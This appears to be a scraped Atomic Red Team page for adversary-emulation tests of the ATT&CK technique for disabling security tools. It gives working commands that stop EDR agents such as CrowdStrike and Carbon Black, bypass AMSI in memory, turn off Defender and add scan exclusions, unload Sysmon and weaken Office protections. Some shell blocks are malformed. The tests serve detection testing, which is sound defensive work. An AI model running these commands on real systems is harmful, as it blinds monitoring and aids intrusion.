Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
-
Atomic Test #8 - Stop and unload Crowdstrike Falcon on macOS
-
Atomic Test #12 - AMSI Bypass - Remove AMSI Provider Reg Key
-
Atomic Test #13 - Disable Arbitrary Security Windows Service
-
Atomic Test #14 - Tamper with Windows Defender ATP PowerShell
-
Atomic Test #15 - Tamper with Windows Defender Command Prompt
-
Atomic Test #17 - Disable Microsoft Office Security Features
-
Atomic Test #19 - Stop and Remove Arbitrary Security Windows Service
-
Atomic Test #21 - Tamper with Windows Defender Evade Scanning -Folder
-
Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Extension
-
Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Process
Disables syslog collection
Supported Platforms: Linux
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service rsyslog stop
chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop rsyslog
systemctl disable rsyslog
fi
Disable the Cb Response service
Supported Platforms: Linux
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
service cbdaemon stop
chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
systemctl stop cbdaemon
systemctl disable cbdaemon
fi
Disables SELinux enforcement
Supported Platforms: Linux
setenforce 0
Stop and disable Crowdstrike Falcon on Linux
Supported Platforms: Linux
sudo systemctl stop falcon-sensor.service
sudo systemctl disable falcon-sensor.service
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
Disables Carbon Black Response
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
Disables LittleSnitch
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
Disables OpenDNS Umbrella
Supported Platforms: macOS
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
Supported Platforms: macOS
Name | Description | Type | Default Value |
---|---|---|---|
falcond_plist | The path of the Crowdstrike Falcon plist file | path | /Library/LaunchDaemons/com.crowdstrike.falcond.plist |
userdaemon_plist | The path of the Crowdstrike Userdaemon plist file | path | /Library/LaunchDaemons/com.crowdstrike.userdaemon.plist |
sudo launchctl unload #{falcond_plist}
sudo launchctl unload #{userdaemon_plist}
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv |
fltmc.exe unload #{sysmon_driver}
sysmon -u -i > nul 2>&1
sysmon -i -accepteula -i > nul 2>&1
%temp%\Sysmon\sysmon.exe -u > nul 2>&1
%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
Remove-Item $env:TEMP\Sysmon.zip -Force
if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
sysmon -u
sysmon -accepteula -i
Uninstall Sysinternals Sysmon for Defense Evasion
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1562.001\bin\sysmon.exe |
sysmon -u
sysmon -i -accepteula >nul 2>&1
if(cmd /c where sysmon) {exit 0} else {exit 1}
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
if(cmd /c sc query sysmon) { exit 0} else { exit 1}
cmd /c sysmon -i -accepteula
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. Upon execution, no output is displayed.
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Supported Platforms: Windows
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection. This test removes the Windows Defender provider registry key. Upon execution, no output is displayed. Open Registry Editor and navigate to "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" to verify that it is gone.
Supported Platforms: Windows
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed. Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service. To verify that the service has stopped, run "sc query McAfeeDLPAgentService"
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to stop | String | McAfeeDLPAgentService |
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings.
Supported Platforms: Windows
Set-MpPreference -DisableRealtimeMonitoring 1
Set-MpPreference -DisableBehaviorMonitoring 1
Set-MpPreference -DisableScriptScanning 1
Set-MpPreference -DisableBlockAtFirstSeen 1
Set-MpPreference -DisableRealtimeMonitoring 0
Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
Supported Platforms: Windows
sc stop WinDefend
sc config WinDefend start=disabled
sc query WinDefend
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.
Supported Platforms: Windows
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security"
New-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableInternetFilesInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableUnsafeLocationsInPV" -Value "1" -PropertyType "Dword"
New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -Name "DisableAttachementsInPV" -Value "1" -PropertyType "Dword"
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Supported Platforms: Windows
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
service_name | The name of the service to remove | String | McAfeeDLPAgentService |
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe |
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
excluded_folder | This folder will be excluded from scanning | String | C:\Temp |
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
excluded_exts | A list of extension to exclude from scanning | string | .exe |
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts
Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
Supported Platforms: Windows
Name | Description | Type | Default Value |
---|---|---|---|
excluded_process | A list of processes to exclude from scanning | string | outlook.exe |
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess